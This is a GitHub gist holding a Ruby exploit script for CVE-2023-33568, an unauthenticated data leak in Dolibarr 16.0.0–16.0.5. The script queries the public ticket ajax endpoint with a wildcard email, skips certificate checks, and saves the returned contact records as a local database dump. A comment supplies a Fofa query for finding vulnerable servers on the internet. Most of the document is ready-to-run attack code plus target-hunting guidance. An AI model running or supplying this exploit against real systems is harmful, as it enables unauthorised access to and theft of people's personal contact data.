Created
June 24, 2023 18:56
-
-
Save komodoooo/5bf30ba86dc5991304fcf34a7a6f5e26 to your computer and use it in GitHub Desktop.
CVE-2023-33568 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'http' | |
| require 'openssl' | |
| puts """ | |
| CVE-2023-33568 | |
| Dolibarr 16.0.0 to 16.0.5 unauthenticated DB access exploit | |
| By komodo\n | |
| """ | |
| =begin | |
| Exploit works only if a contact file exists on the vulnerbale target. | |
| Fofa query to search vulnerable targets: | |
| app="Dolibarr"&&(body="16.0.0"||body="16.0.1"||body="16.0.2"||body="16.0.3"||body="16.0.4"||body="16.0.5") | |
| =end | |
| $cont=1 | |
| $dirname="Dolibarr_dump" | |
| def dir(name=$dirname) | |
| begin | |
| Dir.mkdir(name) | |
| Dir.chdir(name) | |
| rescue Errno::EEXIST | |
| $cont+=1 | |
| dir("#{$dirname}-#{$cont}") | |
| end | |
| end | |
| def main(url) | |
| url.delete_suffix!("/") unless url[-1..-1] != "/" | |
| @ctx = OpenSSL::SSL::SSLContext.new() | |
| @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE | |
| r=HTTP.get("#{url}/public/ticket/ajax/ajax.php?action=getContacts&email=%",:ssl_context=>@ctx) | |
| if r.body.to_s[0..0xc]=='{"contacts":['&&r.body.to_s[0xd]!="]" | |
| dir() | |
| File.open("!target.txt", "w"){|f|f.write(url)} | |
| File.new("db_dump.json","w").write(r.body) | |
| puts "Database dump saved on '#{Dir.pwd.split("/")[-1]}/db_dump.json' file." | |
| else | |
| puts "Not vulnerable! :(\n" | |
| end | |
| end | |
| begin | |
| print "Base URL: " | |
| main(gets.chomp) | |
| rescue => e | |
| abort(e.to_s) | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment